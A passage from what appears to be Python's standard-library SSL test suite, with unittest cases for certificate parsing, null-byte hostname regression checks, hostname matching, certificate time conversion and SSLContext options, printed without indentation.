CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
def test_wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
context = ssl.SSLContext(ssl_version)
if cert_reqs is not None:
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Oct 5 23:01:56 2020 GMT'))
self.assertEqual(p['notBefore'], asn1time('Oct 8 23:01:56 2010 GMT'))
self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1\n'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raised by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in subsequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
ok(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen()
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = support.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipIf(ssl.OPENSSL_VERSION_INFO < (1, 0, 2, 0, 0), 'OpenSSL too old')
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE)
self.assertEqual(default, ctx.options)
